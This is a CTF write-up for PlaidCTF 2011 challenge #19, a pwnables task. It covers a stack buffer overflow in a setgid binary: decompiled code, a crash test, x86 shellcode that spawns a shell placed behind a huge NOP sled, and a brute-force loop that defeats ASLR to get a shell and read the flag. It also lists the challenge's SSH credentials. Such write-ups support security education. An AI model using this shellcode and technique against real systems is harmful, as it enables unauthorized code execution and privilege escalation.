PlaidCTF 2011 #19 – Another small bug (250)

Category: pwnables

This time, let’s attack /opt/pctf/z2/exploitme.
ssh username@a5.amalgamated.biz

Username: z2_1
Password: 29rpJinvpwoI7pzdufQc4h6edzvyh

Summary: buffer overflow, static binary

binary

int main(int a1, int a2) {
  char v3; // [sp+1Ch] [bp-204h]@7
  unsigned int v4; // [sp+21Ch] [bp-4h]@4

  if ( a1 != 2 )
  {
    printf("%s requires one arguments.\n", *(_DWORD *)a2);
    exit(1);
  }
  v4 = strtoul(*(_DWORD *)(a2 + 4));
  if ( v4 > 0x1FF )
  {
    if ( log_error((int)"[assertion] len < sizeof(buffer)") )
      myexit(2);
  }
  fgets_unlocked(&v3, v4, stdin);
  puts(&v3);
  return 0;
}

Hmm, an interesting thing: when given size is too large, exit(2) is called only when log_error returned not 0. Let’s check if it works:

z2_1@a5:~$ perl -e 'print "A"x1024;' | /opt/pctf/z2/exploitme 1024
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation fault

Yeah, buffer is overflowed. Let’s check for nx:

smallbug2 $ execstack -q binary
X binary

Cool, nx bit is not set. Unhappily ASLR is presented, but we can make a huge nopsled and make some tries:

z2_1@a5:~$ export SC="`perl -e 'print "\x90"x64000 .
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58
\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f
\x62\x69\x89\xe3\x89\xd1\xcd\x80";'`"

Get one of possible addresses:

z2_1@a5:~$ perl -e 'print "A"x1024;' >input
z2_1@a5:~$ gdb /opt/pctf/z2/exploitme
(gdb) r 1024 <input
(gdb) p/x $esp+20000
$1 = 0xbfdea7b0

Run!

z2_1@a5:~$ while [ 0 ]; do (perl -e 'print "\xb0\xa7\xde\xbf"x256;';
echo; cat) | /opt/pctf/z2/exploitme 1024; done

After ~20 segfaulis we get a shell:

id
uid=2000(z2_1) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
cat /opt/pctf/z2/key
This is the key: EASTEREGGHUNTS_ARE_FUN

The flag: EASTEREGGHUNTS_ARE_FUN

Leave a Reply

Your email address will not be published.